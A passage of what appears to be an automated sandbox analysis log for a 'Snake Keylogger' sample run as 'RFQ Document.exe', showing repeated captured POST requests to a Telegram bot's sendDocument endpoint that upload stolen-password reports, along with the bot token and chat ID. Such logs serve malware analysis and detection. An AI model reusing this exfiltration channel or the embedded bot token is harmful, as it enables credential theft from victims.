                                            2021-09-28 05:59:47 UTC470OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 35 64 39 62 65 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f5d9be34Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:48 UTC470INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:48 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:48 UTC471INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 38 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 38 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12885,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808788,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            296192.168.2.450133149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:48 UTC471OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f5f1944b
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:48 UTC472OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 35 66 31 39 34 34 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f5f1944bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:48 UTC472INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:48 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:48 UTC472INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 38 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 38 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12886,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808788,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            297192.168.2.450134149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:48 UTC473OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f60e30cf
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:48 UTC473OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 36 30 65 33 30 63 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f60e30cfContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:48 UTC474INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:48 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:48 UTC474INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 38 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 38 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12887,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808788,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            298192.168.2.450135149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:48 UTC474OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f6260960
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:48 UTC475OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 36 32 36 30 39 36 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f6260960Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:48 UTC475INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:48 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:48 UTC475INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 38 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12888,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808788,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            299192.168.2.450136149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:48 UTC476OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f63ddf5a
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:48 UTC476OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 36 33 64 64 66 35 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f63ddf5aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:48 UTC477INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:48 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:48 UTC477INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 38 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 38 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12889,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808788,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            3192.168.2.449777149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:21 UTC4OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c23319c3
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:21 UTC4OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 32 33 33 31 39 63 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c23319c3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:21 UTC5INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:21 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:21 UTC5INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 38 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 31 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12582,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808701,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            30192.168.2.449804149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:26 UTC47OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c57a55a2
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:26 UTC48OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 35 37 61 35 35 61 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c57a55a2Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:26 UTC48INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:26 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:26 UTC48INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 31 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12610,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808706,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            300192.168.2.450137149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:48 UTC478OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f65a7c41
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:48 UTC478OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 36 35 61 37 63 34 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
